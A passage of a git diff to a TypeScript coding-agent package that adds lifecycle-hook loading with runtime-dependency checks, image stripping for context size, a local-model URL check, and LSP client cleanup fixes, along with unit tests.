+		return { imageCount: 0, processed: false, strippedCount: 0 };
+	}
+
+	// Determine which images to strip (all except the N most recent)
+	const stripCount = Math.max(0, imageCount - RECENT_IMAGES_TO_KEEP);
+	if (stripCount === 0) {
+		return { imageCount, processed: false, strippedCount: 0 };
+	}
+
+	const toStrip = imageLocations.slice(0, stripCount);
+
+	// Second pass: replace stripped images with text placeholder.
+	// Process in reverse order to maintain content indices.
+	for (let i = toStrip.length - 1; i >= 0; i--) {
+		const { msgIdx, contentIdx } = toStrip[i];
+		const msg = messages[msgIdx];
+		if (msg.role === "assistant") continue;
+		if (msg.role === "user" && typeof msg.content === "string") continue;
+
+		const contentArr = msg.content as (TextContent | ImageContent)[];
+		const imageBlock = contentArr[contentIdx] as ImageContent;
+		const mimeType = imageBlock.mimeType || "image/unknown";
+
+		// Replace the image block with a text placeholder
+		(contentArr as any[])[contentIdx] = {
+			type: "text",
+			text: `[image removed to reduce context size — was ${mimeType}]`,
+		} as TextContent;
+	}
+
+	return { imageCount, processed: true, strippedCount: stripCount };
+}
diff --git a/packages/pi-coding-agent/src/core/index.ts b/packages/pi-coding-agent/src/core/index.ts
index 10c6f1753..5dd346548 100644
--- a/packages/pi-coding-agent/src/core/index.ts
+++ b/packages/pi-coding-agent/src/core/index.ts
@@ -29,6 +29,7 @@ export {
 	type ExecResult,
 	type Extension,
 	type ExtensionAPI,
+	type ExtensionManifest,
 	type ExtensionCommandContext,
 	type ExtensionContext,
 	type ExtensionError,
@@ -53,6 +54,11 @@ export {
 	type SessionSwitchEvent,
 	type SessionTreeEvent,
 	type ToolCallEvent,
+	readManifest,
+	readManifestFromEntryPath,
+	type SortResult,
+	type SortWarning,
+	sortExtensionPaths,
 	type ToolDefinition,
 	type ToolRenderResultOptions,
 	type ToolResultEvent,
diff --git a/packages/pi-coding-agent/src/core/lifecycle-hooks.test.ts b/packages/pi-coding-agent/src/core/lifecycle-hooks.test.ts
new file mode 100644
index 000000000..d19c87d16
--- /dev/null
+++ b/packages/pi-coding-agent/src/core/lifecycle-hooks.test.ts
@@ -0,0 +1,227 @@
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, rmSync, writeFileSync, existsSync } from "node:fs";
+import { homedir, tmpdir } from "node:os";
+import { join, resolve } from "node:path";
+import { describe, it } from "node:test";
+import {
+	readManifestRuntimeDeps,
+	collectRuntimeDependencies,
+	verifyRuntimeDependencies,
+	resolveLocalSourcePath,
+} from "./lifecycle-hooks.js";
+
+function tmpDir(prefix: string, t: { after: (fn: () => void) => void }): string {
+	const dir = mkdtempSync(join(tmpdir(), `pi-lh-${prefix}-`));
+	t.after(() => rmSync(dir, { recursive: true, force: true }));
+	return dir;
+}
+
+// ─── readManifestRuntimeDeps ──────────────────────────────────────────────────
+
+describe("readManifestRuntimeDeps", () => {
+	it("returns empty array when manifest file is missing", (t) => {
+		const dir = tmpDir("no-manifest", t);
+		assert.deepEqual(readManifestRuntimeDeps(dir), []);
+	});
+
+	it("returns empty array for malformed JSON", (t) => {
+		const dir = tmpDir("bad-json", t);
+		writeFileSync(join(dir, "extension-manifest.json"), "not json{{{", "utf-8");
+		assert.deepEqual(readManifestRuntimeDeps(dir), []);
+	});
+
+	it("returns runtime deps from valid manifest", (t) => {
+		const dir = tmpDir("valid", t);
+		writeFileSync(join(dir, "extension-manifest.json"), JSON.stringify({
+			dependencies: { runtime: ["claude", "node"] },
+		}), "utf-8");
+		assert.deepEqual(readManifestRuntimeDeps(dir), ["claude", "node"]);
+	});
+
+	it("returns empty array when dependencies exists but runtime is missing", (t) => {
+		const dir = tmpDir("no-runtime", t);
+		writeFileSync(join(dir, "extension-manifest.json"), JSON.stringify({
+			dependencies: {},
+		}), "utf-8");
+		assert.deepEqual(readManifestRuntimeDeps(dir), []);
+	});
+
+	it("returns empty array when runtime is empty", (t) => {
+		const dir = tmpDir("empty-runtime", t);
+		writeFileSync(join(dir, "extension-manifest.json"), JSON.stringify({
+			dependencies: { runtime: [] },
+		}), "utf-8");
+		assert.deepEqual(readManifestRuntimeDeps(dir), []);
+	});
+
+	it("filters out non-string entries in runtime array", (t) => {
+		const dir = tmpDir("mixed-types", t);
+		writeFileSync(join(dir, "extension-manifest.json"), JSON.stringify({
+			dependencies: { runtime: [123, null, "node", false, "python"] },
+		}), "utf-8");
+		assert.deepEqual(readManifestRuntimeDeps(dir), ["node", "python"]);
+	});
+
+	it("returns empty array when no dependencies field at all", (t) => {
+		const dir = tmpDir("no-deps-field", t);
+		writeFileSync(join(dir, "extension-manifest.json"), JSON.stringify({
+			id: "test",
+			name: "Test",
+		}), "utf-8");
+		assert.deepEqual(readManifestRuntimeDeps(dir), []);
+	});
+});
+
+// ─── collectRuntimeDependencies ───────────────────────────────────────────────
+
+describe("collectRuntimeDependencies", () => {
+	it("aggregates deps from installedPath manifest", (t) => {
+		const dir = tmpDir("collect-installed", t);
+		writeFileSync(join(dir, "extension-manifest.json"), JSON.stringify({
+			dependencies: { runtime: ["claude"] },
+		}), "utf-8");
+		assert.deepEqual(collectRuntimeDependencies(dir, []), ["claude"]);
+	});
+
+	it("aggregates deps from entry path directory manifests", (t) => {
+		const root = tmpDir("collect-entry", t);
+		const installedDir = join(root, "installed");
+		const entryDir = join(root, "entry");
+		mkdirSync(installedDir, { recursive: true });
+		mkdirSync(entryDir, { recursive: true });
+		writeFileSync(join(entryDir, "extension-manifest.json"), JSON.stringify({
+			dependencies: { runtime: ["python"] },
+		}), "utf-8");
+		const deps = collectRuntimeDependencies(installedDir, [join(entryDir, "index.ts")]);
+		assert.deepEqual(deps, ["python"]);
+	});
+
+	it("deduplicates across multiple directories", (t) => {
+		const root = tmpDir("collect-dedup", t);
+		const dir1 = join(root, "dir1");
+		const dir2 = join(root, "dir2");
+		mkdirSync(dir1, { recursive: true });
+		mkdirSync(dir2, { recursive: true });
+		writeFileSync(join(dir1, "extension-manifest.json"), JSON.stringify({
+			dependencies: { runtime: ["node", "python"] },
+		}), "utf-8");
+		writeFileSync(join(dir2, "extension-manifest.json"), JSON.stringify({
+			dependencies: { runtime: ["python", "claude"] },
+		}), "utf-8");
+		const deps = collectRuntimeDependencies(dir1, [join(dir2, "index.ts")]);
+		assert.equal(deps.length, 3);
+		assert.ok(deps.includes("node"));
+		assert.ok(deps.includes("python"));
+		assert.ok(deps.includes("claude"));
+	});
+
+	it("returns empty when no directories have manifests", (t) => {
+		const dir = tmpDir("collect-empty", t);
+		assert.deepEqual(collectRuntimeDependencies(dir, []), []);
+	});
+});
+
+// ─── verifyRuntimeDependencies ────────────────────────────────────────────────
+
+describe("verifyRuntimeDependencies", () => {
+	it("does not throw for empty deps array", () => {
+		assert.doesNotThrow(() => verifyRuntimeDependencies([], "test-source", "pi"));
+	});
+
+	it("does not throw when all deps are present", () => {
+		assert.doesNotThrow(() => verifyRuntimeDependencies(["node"], "test-source", "pi"));
+	});
+
+	it("throws for missing dep with 'Missing runtime dependencies' message", () => {
+		assert.throws(
+			() => verifyRuntimeDependencies(["__nonexistent_dep_for_test__"], "test-source", "pi"),
+			(err: Error) => {
+				assert.ok(err.message.includes("Missing runtime dependencies"));
+				assert.ok(err.message.includes("__nonexistent_dep_for_test__"));
+				return true;
+			},
+		);
+	});
+
+	it("lists all missing deps in error message", () => {
+		assert.throws(
+			() => verifyRuntimeDependencies(["__missing_1__", "__missing_2__"], "test-source", "pi"),
+			(err: Error) => {
+				assert.ok(err.message.includes("__missing_1__"));
+				assert.ok(err.message.includes("__missing_2__"));
+				return true;
+			},
+		);
+	});
+
+	it("includes appName and source in error for retry hint", () => {
+		assert.throws(
+			() => verifyRuntimeDependencies(["__missing__"], "github:user/repo", "gsd"),
+			(err: Error) => {
+				assert.ok(err.message.includes("gsd"));
+				assert.ok(err.message.includes("github:user/repo"));
+				return true;
+			},
+		);
+	});
+});
+
+// ─── resolveLocalSourcePath ───────────────────────────────────────────────────
+
+describe("resolveLocalSourcePath", () => {
+	it("returns undefined for empty string", () => {
+		assert.equal(resolveLocalSourcePath("", "/tmp"), undefined);
+	});
+
+	it("returns undefined for npm: source", () => {
+		assert.equal(resolveLocalSourcePath("npm:@foo/bar", "/tmp"), undefined);
+	});
+
+	it("returns undefined for git URL", () => {
+		assert.equal(resolveLocalSourcePath("git:github.com/user/repo", "/tmp"), undefined);
+	});
+
+	it("returns undefined for https git URL", () => {
+		assert.equal(resolveLocalSourcePath("https://github.com/user/repo", "/tmp"), undefined);
+	});
+
+	it("resolves ~ to homedir", () => {
+		const result = resolveLocalSourcePath("~", "/tmp");
+		if (existsSync(homedir())) {
+			assert.equal(result, homedir());
+		} else {
+			assert.equal(result, undefined);
+		}
+	});
+
+	it("resolves ~/path relative to homedir", () => {
+		const result = resolveLocalSourcePath("~/", "/tmp");
+		if (existsSync(homedir())) {
+			assert.equal(result, homedir());
+		} else {
+			assert.equal(result, undefined);
+		}
+	});
+
+	it("resolves relative path that exists", (t) => {
+		const dir = tmpDir("resolve-rel", t);
+		const sub = join(dir, "myext");
+		mkdirSync(sub, { recursive: true });
+		const result = resolveLocalSourcePath("myext", dir);
+		assert.equal(result, resolve(dir, "myext"));
+	});
+
+	it("returns undefined for relative path that does not exist", (t) => {
+		const dir = tmpDir("resolve-noexist", t);
+		assert.equal(resolveLocalSourcePath("nonexistent", dir), undefined);
+	});
+
+	it("resolves absolute path that exists", (t) => {
+		const dir = tmpDir("resolve-abs", t);
+		assert.equal(resolveLocalSourcePath(dir, "/irrelevant"), dir);
+	});
+
+	it("returns undefined for absolute path that does not exist", () => {
+		assert.equal(resolveLocalSourcePath("/tmp/__nonexistent_path_for_test__", "/tmp"), undefined);
+	});
+});
diff --git a/packages/pi-coding-agent/src/core/lifecycle-hooks.ts b/packages/pi-coding-agent/src/core/lifecycle-hooks.ts
new file mode 100644
index 000000000..fa103ef79
--- /dev/null
+++ b/packages/pi-coding-agent/src/core/lifecycle-hooks.ts
@@ -0,0 +1,280 @@
+import { spawnSync } from "node:child_process";
+import { existsSync, readFileSync } from "node:fs";
+import { homedir } from "node:os";
+import { dirname, join, resolve } from "node:path";
+import { pathToFileURL } from "node:url";
+import { parseGitUrl } from "../utils/git.js";
+import {
+	importExtensionModule,
+	loadExtensions,
+	type LifecycleHookContext,
+	type LifecycleHookMap,
+	type LifecycleHookHandler,
+	type LifecycleHookPhase,
+	type LifecycleHookScope,
+} from "./extensions/index.js";
+import type { DefaultPackageManager } from "./package-manager.js";
+
+interface ExtensionManifest {
+	dependencies?: {
+		runtime?: string[];
+	};
+}
+
+export interface PackageLifecycleHooksOptions {
+	source: string;
+	local: boolean;
+	cwd: string;
+	agentDir: string;
+	appName: string;
+	packageManager: DefaultPackageManager;
+	stdout: NodeJS.WriteStream;
+	stderr: NodeJS.WriteStream;
+}
+
+export type LifecycleHooksTarget = "source" | "installed";
+
+export interface PrepareLifecycleHooksOptions {
+	verifyRuntimeDependencies?: boolean;
+}
+
+export interface LifecycleHooksRunResult {
+	phase: LifecycleHookPhase;
+	hooksRun: number;
+	hookErrors: number;
+	legacyHooksRun: number;
+	entryPathCount: number;
+	skipped: boolean;
+}
+
+interface LoadedLifecycleHooks {
+	source: string;
+	scope: LifecycleHookScope;
+	installedPath?: string;
+	cwd: string;
+	stdout: NodeJS.WriteStream;
+	stderr: NodeJS.WriteStream;
+	entryPaths: string[];
+	hooksByPath: Map<string, LifecycleHookMap>;
+}
+
+function toScope(local: boolean): LifecycleHookScope {
+	return local ? "project" : "user";
+}
+
+export function readManifestRuntimeDeps(dir: string): string[] {
+	const manifestPath = join(dir, "extension-manifest.json");
+	if (!existsSync(manifestPath)) return [];
+	try {
+		const manifest = JSON.parse(readFileSync(manifestPath, "utf-8")) as ExtensionManifest;
+		return manifest.dependencies?.runtime?.filter((dep): dep is string => typeof dep === "string") ?? [];
+	} catch {
+		return [];
+	}
+}
+
+export function collectRuntimeDependencies(installedPath: string, entryPaths: string[]): string[] {
+	const deps = new Set<string>();
+	const candidateDirs = new Set<string>([installedPath, ...entryPaths.map((entryPath) => dirname(entryPath))]);
+	for (const dir of candidateDirs) {
+		for (const dep of readManifestRuntimeDeps(dir)) {
+			deps.add(dep);
+		}
+	}
+	return Array.from(deps);
+}
+
+export function verifyRuntimeDependencies(runtimeDeps: string[], source: string, appName: string): void {
+	const missing: string[] = [];
+	for (const dep of runtimeDeps) {
+		const result = spawnSync(dep, ["--version"], { encoding: "utf-8", timeout: 5000 });
+		if (result.error || result.status !== 0) {
+			missing.push(dep);
+		}
+	}
+	if (missing.length === 0) return;
+	throw new Error(
+		`Missing runtime dependencies: ${missing.join(", ")}.\n` +
+			`Install them and retry: ${appName} install ${source}`,
+	);
+}
+
+export function resolveLocalSourcePath(source: string, cwd: string): string | undefined {
+	const trimmed = source.trim();
+	if (!trimmed) return undefined;
+	if (trimmed.startsWith("npm:")) return undefined;
+	if (parseGitUrl(trimmed)) return undefined;
+
+	let normalized = trimmed;
+	if (normalized === "~") {
+		normalized = homedir();
+	} else if (normalized.startsWith("~/")) {
+		normalized = join(homedir(), normalized.slice(2));
+	}
+
+	const absolutePath = resolve(cwd, normalized);
+	return existsSync(absolutePath) ? absolutePath : undefined;
+}
+
+async function resolveEntryPathsFromTarget(
+	options: PackageLifecycleHooksOptions,
+	target: LifecycleHooksTarget,
+	scope: LifecycleHookScope,
+): Promise<{ entryPaths: string[]; installedPath?: string }> {
+	if (target === "source") {
+		const localSourcePath = resolveLocalSourcePath(options.source, options.cwd);
+		if (!localSourcePath) return { entryPaths: [] };
+		const resolved = await options.packageManager.resolveExtensionSources([localSourcePath], { local: true });
+		const entryPaths = resolved.extensions.filter((resource) => resource.enabled).map((resource) => resource.path);
+		return { entryPaths, installedPath: localSourcePath };
+	}
+
+	const installedPath = options.packageManager.getInstalledPath(options.source, scope);
+	if (!installedPath) return { entryPaths: [] };
+	const resolved = await options.packageManager.resolveExtensionSources([installedPath], { local: true });
+	const entryPaths = resolved.extensions.filter((resource) => resource.enabled).map((resource) => resource.path);
+	return { entryPaths, installedPath };
+}
+
+export async function prepareLifecycleHooks(
+	options: PackageLifecycleHooksOptions,
+	target: LifecycleHooksTarget,
+	prepareOptions?: PrepareLifecycleHooksOptions,
+): Promise<LoadedLifecycleHooks | null> {
+	const scope = toScope(options.local);
+	const { entryPaths, installedPath } = await resolveEntryPathsFromTarget(options, target, scope);
+	if (entryPaths.length === 0) {
+		return null;
+	}
+
+	if (prepareOptions?.verifyRuntimeDependencies && installedPath) {
+		const runtimeDeps = collectRuntimeDependencies(installedPath, entryPaths);
+		verifyRuntimeDependencies(runtimeDeps, options.source, options.appName);
+	}
+
+	const loaded = await loadExtensions(entryPaths, options.cwd);
+	for (const { path, error } of loaded.errors) {
+		options.stderr.write(`[lifecycle-hooks] Failed to load extension "${path}": ${error}\n`);
+	}
+
+	const hooksByPath = new Map<string, LifecycleHookMap>();
+	for (const extension of loaded.extensions) {
+		hooksByPath.set(extension.path, extension.lifecycleHooks);
+	}
+
+	return {
+		source: options.source,
+		scope,
+		installedPath,
+		cwd: options.cwd,
+		stdout: options.stdout,
+		stderr: options.stderr,
+		entryPaths,
+		hooksByPath,
+	};
+}
+
+async function runHookSafe(
+	hook: LifecycleHookHandler,
+	context: LifecycleHookContext,
+	stderr: NodeJS.WriteStream,
+): Promise<boolean> {
+	try {
+		await hook(context);
+		return true;
+	} catch (error) {
+		const message = error instanceof Error ? error.message : String(error);
+		stderr.write(`[lifecycle-hooks:${context.phase}] Hook failed: ${message}\n`);
+		return false;
+	}
+}
+
+function getLegacyExportCandidates(phase: LifecycleHookPhase): string[] {
+	return [phase];
+}
+
+const _legacyModuleCache = new Map<string, Record<string, unknown>>();
+
+async function runLegacyExportHook(
+	entryPath: string,
+	phase: LifecycleHookPhase,
+	context: LifecycleHookContext,
+): Promise<LifecycleHookHandler | null> {
+	try {
+		let module = _legacyModuleCache.get(entryPath);
+		if (!module) {
+			module = await importExtensionModule<Record<string, unknown>>(import.meta.url, pathToFileURL(entryPath).href);
+			_legacyModuleCache.set(entryPath, module);
+		}
+		for (const exportName of getLegacyExportCandidates(phase)) {
+			const candidate = module[exportName];
+			if (typeof candidate === "function") {
+				return candidate as LifecycleHookHandler;
+			}
+		}
+		return null;
+	} catch {
+		return null;
+	}
+}
+
+export async function runLifecycleHooks(
+	loaded: LoadedLifecycleHooks | null,
+	phase: LifecycleHookPhase,
+): Promise<LifecycleHooksRunResult> {
+	if (!loaded) {
+		return {
+			phase,
+			hooksRun: 0,
+			hookErrors: 0,
+			legacyHooksRun: 0,
+			entryPathCount: 0,
+			skipped: true,
+		};
+	}
+
+	const context: LifecycleHookContext = {
+		phase,
+		source: loaded.source,
+		installedPath: loaded.installedPath,
+		scope: loaded.scope,
+		cwd: loaded.cwd,
+		interactive: Boolean(process.stdin.isTTY && process.stdout.isTTY),
+		log: (message) => loaded.stdout.write(`${message}\n`),
+		warn: (message) => loaded.stderr.write(`${message}\n`),
+		error: (message) => loaded.stderr.write(`${message}\n`),
+	};
+
+	let hooksRun = 0;
+	let hookErrors = 0;
+	let legacyHooksRun = 0;
+
+	for (const entryPath of loaded.entryPaths) {
+		const hookMap = loaded.hooksByPath.get(entryPath);
+		const registeredHooks = hookMap?.[phase] ?? [];
+		if (registeredHooks.length > 0) {
+			for (const hook of registeredHooks) {
+				hooksRun += 1;
+				const ok = await runHookSafe(hook, context, loaded.stderr);
+				if (!ok) hookErrors += 1;
+			}
+			continue;
+		}
+
+		const legacyHook = await runLegacyExportHook(entryPath, phase, context);
+		if (!legacyHook) continue;
+
+		legacyHooksRun += 1;
+		const ok = await runHookSafe(legacyHook, context, loaded.stderr);
+		if (!ok) hookErrors += 1;
+	}
+
+	return {
+		phase,
+		hooksRun,
+		hookErrors,
+		legacyHooksRun,
+		entryPathCount: loaded.entryPaths.length,
+		skipped: false,
+	};
+}
diff --git a/packages/pi-coding-agent/src/core/local-model-check.ts b/packages/pi-coding-agent/src/core/local-model-check.ts
new file mode 100644
index 000000000..b468e459f
--- /dev/null
+++ b/packages/pi-coding-agent/src/core/local-model-check.ts
@@ -0,0 +1,45 @@
+/**
+ * local-model-check.ts — Utility to detect if a model baseUrl is local.
+ *
+ * Leaf module with zero transitive dependencies on TypeScript parameter properties.
+ * Used by ModelRegistry and tests.
+ */
+
+/**
+ * Check if a model's baseUrl points to a local endpoint.
+ * Returns true for localhost, 127.0.0.1, 0.0.0.0, ::1, or unix socket paths.
+ * Returns false if baseUrl is empty (cloud provider) or points to a remote host.
+ */
+export function isLocalModel(model: { baseUrl: string }): boolean {
+	const url = model.baseUrl;
+	if (!url) return false;
+
+	// Unix socket paths
+	if (url.startsWith("unix://") || url.startsWith("unix:")) return true;
+
+	try {
+		const parsed = new URL(url);
+		const hostname = parsed.hostname;
+		if (
+			hostname === "localhost" ||
+			hostname === "127.0.0.1" ||
+			hostname === "0.0.0.0" ||
+			hostname === "::1" ||
+			hostname === "[::1]"
+		) {
+			return true;
+		}
+	} catch {
+		// If URL parsing fails, check raw string for local patterns
+		if (
+			url.includes("localhost") ||
+			url.includes("127.0.0.1") ||
+			url.includes("0.0.0.0") ||
+			url.includes("[::1]")
+		) {
+			return true;
+		}
+	}
+
+	return false;
+}
diff --git a/packages/pi-coding-agent/src/core/lsp/client.ts b/packages/pi-coding-agent/src/core/lsp/client.ts
index 930dc8374..400b2beb0 100644
--- a/packages/pi-coding-agent/src/core/lsp/client.ts
+++ b/packages/pi-coding-agent/src/core/lsp/client.ts
@@ -24,11 +24,25 @@ const clients = new Map<string, LspClient>();
 const clientLocks = new Map<string, Promise<LspClient>>();
 const fileOperationLocks = new Map<string, Promise<void>>();
 
+/** Track stream listeners per client so they can be removed on shutdown. */
+interface StreamHandlers {
+	stdoutData?: (chunk: Buffer) => void;
+	stdoutEnd?: () => void;
+	stdoutError?: () => void;
+	stderrData?: (chunk: Buffer) => void;
+	stderrEnd?: () => void;
+	stderrError?: () => void;
+}
+const clientStreamHandlers = new Map<string, StreamHandlers>();
+
 // Idle timeout configuration (disabled by default)
 let idleTimeoutMs: number | null = null;
 let idleCheckInterval: ReturnType<typeof setInterval> | null = null;
 const IDLE_CHECK_INTERVAL_MS = 60 * 1000;
 
+/** Maximum allowed size for the message buffer (10 MB). */
+const MAX_MESSAGE_BUFFER_SIZE = 10 * 1024 * 1024;
+
 /**
  * Configure the idle timeout for LSP clients.
  */
@@ -52,6 +66,10 @@ function startIdleChecker(): void {
 				shutdownClient(key);
 			}
 		}
+		// Stop the checker if there are no more clients to monitor
+		if (clients.size === 0) {
+			stopIdleChecker();
+		}
 	}, IDLE_CHECK_INTERVAL_MS);
 }
 
@@ -250,8 +268,21 @@ async function startMessageReader(client: LspClient): Promise<void> {
 	}
 
 	return new Promise<void>((resolve) => {
-		stdout.on("data", async (chunk: Buffer) => {
+		const handlers = clientStreamHandlers.get(client.name) ?? {};
+
+		handlers.stdoutData = async (chunk: Buffer) => {
 			const currentBuffer: Buffer = Buffer.concat([client.messageBuffer, chunk]);
+
+			if (currentBuffer.length > MAX_MESSAGE_BUFFER_SIZE) {
+				if (process.env.DEBUG) {
+					console.error(
+						`[lsp] Message buffer exceeded ${MAX_MESSAGE_BUFFER_SIZE} bytes (${currentBuffer.length}), discarding`,
+					);
+				}
+				client.messageBuffer = Buffer.alloc(0);
+				return;
+			}
+
 			client.messageBuffer = currentBuffer;
 
 			let workingBuffer = currentBuffer;
@@ -289,17 +320,22 @@ async function startMessageReader(client: LspClient): Promise<void> {
 			}
 
 			client.messageBuffer = workingBuffer;
-		});
+		};
+		stdout.on("data", handlers.stdoutData);
 
-		stdout.on("end", () => {
+		handlers.stdoutEnd = () => {
 			client.isReading = false;
 			resolve();
-		});
+		};
+		stdout.on("end", handlers.stdoutEnd);
 
-		stdout.on("error", () => {
+		handlers.stdoutError = () => {
 			client.isReading = false;
 			resolve();
-		});
+		};
+		stdout.on("error", handlers.stdoutError);
+
+		clientStreamHandlers.set(client.name, handlers);
 	});
 }
 
@@ -384,21 +420,28 @@ async function startStderrReader(client: LspClient): Promise<void> {
 	if (!stderr) return;
 
 	return new Promise<void>((resolve) => {
-		stderr.on("data", (chunk: Buffer) => {
+		const handlers = clientStreamHandlers.get(client.name) ?? {};
+
+		handlers.stderrData = (chunk: Buffer) => {
 			const text = chunk.toString("utf-8");
 			client.stderrBuffer += text;
 			if (client.stderrBuffer.length > 4096) {
 				client.stderrBuffer = client.stderrBuffer.slice(-4096);
 			}
-		});
+		};
+		stderr.on("data", handlers.stderrData);
 
-		stderr.on("end", () => {
+		handlers.stderrEnd = () => {
 			resolve();
-		});
+		};
+		stderr.on("end", handlers.stderrEnd);
 
-		stderr.on("error", () => {
+		handlers.stderrError = () => {
 			resolve();
-		});
+		};
+		stderr.on("error", handlers.stderrError);
+
+		clientStreamHandlers.set(client.name, handlers);
 	});
 }
 
@@ -688,6 +731,23 @@ export function notifyFileChanged(filePath: string): void {
 	}
 }
 
+/**
+ * Remove stdout/stderr stream listeners for a client to prevent leaks.
+ */
+function removeStreamHandlers(client: LspClient): void {
+	const handlers = clientStreamHandlers.get(client.name);
+	if (!handlers) return;
+
+	if (handlers.stdoutData) client.proc.stdout?.removeListener("data", handlers.stdoutData);
+	if (handlers.stdoutEnd) client.proc.stdout?.removeListener("end", handlers.stdoutEnd);
+	if (handlers.stdoutError) client.proc.stdout?.removeListener("error", handlers.stdoutError);
+	if (handlers.stderrData) client.proc.stderr?.removeListener("data", handlers.stderrData);
+	if (handlers.stderrEnd) client.proc.stderr?.removeListener("end", handlers.stderrEnd);
+	if (handlers.stderrError) client.proc.stderr?.removeListener("error", handlers.stderrError);
+
+	clientStreamHandlers.delete(client.name);
+}
+
 /**
  * Shutdown a specific client by key.
  */
@@ -702,12 +762,23 @@ function shutdownClient(key: string): void {
 
 	sendRequest(client, "shutdown", null).catch(() => {});
 
+	// Remove stream listeners before killing the process
+	removeStreamHandlers(client);
+
 	try {
 		killProcessTree(client.proc.pid);
 	} catch {
 		client.proc.kill();
 	}
 	clients.delete(key);
+	clientLocks.delete(key);
+
+	// Clean up any file operation locks associated with this client
+	for (const lockKey of Array.from(fileOperationLocks.keys())) {
+		if (lockKey.startsWith(`${key}:`)) {
+			fileOperationLocks.delete(lockKey);
+		}
+	}
 }
 
 // =============================================================================
@@ -822,6 +893,9 @@ async function sendNotification(client: LspClient, method: string, params: unkno
 function shutdownAll(): void {
 	const clientsToShutdown = Array.from(clients.values());
 	clients.clear();
+	clientLocks.clear();
+	fileOperationLocks.clear();
+	stopIdleChecker();
 
 	const err = new Error("LSP client shutdown");
 	for (const client of clientsToShutdown) {
@@ -831,6 +905,9 @@ function shutdownAll(): void {
 			pending.reject(err);
 		}
 
+		// Remove stream listeners before killing the process
+		removeStreamHandlers(client);
+
 		void (async () => {
 			const timeout = new Promise<void>(resolve => setTimeout(resolve, 5_000));
 			const result = sendRequest(client, "shutdown", null).catch(() => {});
@@ -864,14 +941,28 @@ export function getActiveClients(): LspServerStatus[] {
 // Process Cleanup
 // =============================================================================
 
+const _beforeExitHandler = () => shutdownAll();
+const _sigintHandler = () => {
+	shutdownAll();
+	process.exit(0);
+};
+const _sigtermHandler = () => {
+	shutdownAll();
+	process.exit(0);
+};
+
 if (typeof process !== "undefined") {
-	process.on("beforeExit", shutdownAll);
-	process.on("SIGINT", () => {
-		shutdownAll();
-		process.exit(0);
-	});
-	process.on("SIGTERM", () => {
-		shutdownAll();
-		process.exit(0);
-	});
+	process.on("beforeExit", _beforeExitHandler);
+	process.on("SIGINT", _sigintHandler);
+	process.on("SIGTERM", _sigtermHandler);
+}
+
+/**
+ * Remove process-level signal handlers registered at module load.
+ * Call this during graceful teardown to prevent leaked listeners.
+ */
+export function removeProcessHandlers(): void {
+	process.off("beforeExit", _beforeExitHandler);
+	process.off("SIGINT", _sigintHandler);
+	process.off("SIGTERM", _sigtermHandler);
 }
diff --git a/packages/pi-coding-agent/src/core/lsp/config.ts b/packages/pi-coding-agent/src/core/lsp/config.ts
index cc104be21..758657856 100644
--- a/packages/pi-coding-agent/src/core/lsp/config.ts
+++ b/packages/pi-coding-agent/src/core/lsp/config.ts
@@ -12,6 +12,11 @@ import type { ServerConfig } from "./types.js";
 const require = createRequire(import.meta.url);
 const DEFAULTS = require("./defaults.json") as Record<string, Partial<ServerConfig>>;
 
+/** Map legacy server keys to their current names so user overrides still merge. */
+const LEGACY_ALIASES: Record<string, string> = {
+	"kotlin-language-server": "kotlin-lsp",
+};
+
 export interface LspConfig {
 	servers: Record<string, ServerConfig>;
 	/** Idle timeout in milliseconds. If set, LSP clients will be shutdown after this period of inactivity. Disabled by default. */
@@ -109,7 +114,8 @@ function mergeServers(
 	overrides: Record<string, Partial<ServerConfig>>,
 ): Record<string, ServerConfig> {
 	const merged: Record<string, ServerConfig> = { ...base };
-	for (const [name, config] of Object.entries(overrides)) {
+	for (const [rawName, config] of Object.entries(overrides)) {
+		const name = LEGACY_ALIASES[rawName] ?? rawName;
 		if (merged[name]) {
 			const candidate = { ...merged[name], ...config };
 			const normalized = normalizeServerConfig(name, candidate);
diff --git a/packages/pi-coding-agent/src/core/lsp/defaults.json b/packages/pi-coding-agent/src/core/lsp/defaults.json
index dbea73b6c..6bc16ba82 100644
--- a/packages/pi-coding-agent/src/core/lsp/defaults.json
+++ b/packages/pi-coding-agent/src/core/lsp/defaults.json
@@ -189,8 +189,8 @@
 		"fileTypes": [".java"],
 		"rootMarkers": ["pom.xml", "build.gradle", "build.gradle.kts", "settings.gradle", ".project"]
 	},
-	"kotlin-language-server": {
-		"command": "kotlin-language-server",
+	"kotlin-lsp": {
+		"command": "kotlin-lsp",
 		"args": [],
 		"fileTypes": [".kt", ".kts"],
 		"rootMarkers": ["build.gradle", "build.gradle.kts", "pom.xml", "settings.gradle", "settings.gradle.kts"]
diff --git a/packages/pi-coding-agent/src/core/lsp/index.ts b/packages/pi-coding-agent/src/core/lsp/index.ts
index 61237e7eb..bd2718634 100644
--- a/packages/pi-coding-agent/src/core/lsp/index.ts
+++ b/packages/pi-coding-agent/src/core/lsp/index.ts
@@ -340,6 +340,9 @@ async function runWorkspaceDiagnostics(
 	const proc = spawn(cmd, cmdArgs, {
 		cwd,
 		stdio: ["ignore", "pipe", "pipe"],
+		// On Windows, project-type commands (tsc, cargo, etc.) may be .cmd
+		// wrappers that need shell resolution to avoid ENOENT/EINVAL (#2854).
+		shell: process.platform === "win32",
 	});
 	const abortHandler = () => {
 		proc.kill();
diff --git a/packages/pi-coding-agent/src/core/lsp/lsp-legacy-alias.test.ts b/packages/pi-coding-agent/src/core/lsp/lsp-legacy-alias.test.ts
new file mode 100644
index 000000000..c1d4d99ec
--- /dev/null
+++ b/packages/pi-coding-agent/src/core/lsp/lsp-legacy-alias.test.ts
@@ -0,0 +1,70 @@
+// GSD2 — Regression test for LSP legacy server key aliases
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+/**
+ * When a default server key is renamed (e.g., kotlin-language-server → kotlin-lsp),
+ * user overrides referencing the old key must still merge correctly via LEGACY_ALIASES.
+ *
+ * This test exercises the merge path through loadConfig() with a temp project
+ * containing an lsp.json that uses the legacy key.
+ */
+
+import { describe, it, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import * as fs from "node:fs";
+import * as path from "node:path";
+import * as os from "node:os";
+import { loadConfig } from "./config.js";
+
+describe("LSP legacy server key aliases", () => {
+	let tmpDir: string;
+
+	beforeEach(() => {
+		tmpDir = fs.mkdtempSync(path.join(os.tmpdir(), "lsp-alias-test-"));
+	});
+
+	afterEach(() => {
+		fs.rmSync(tmpDir, { recursive: true, force: true });
+	});
+
+	it("merges user override with legacy key 'kotlin-language-server' into 'kotlin-lsp'", () => {
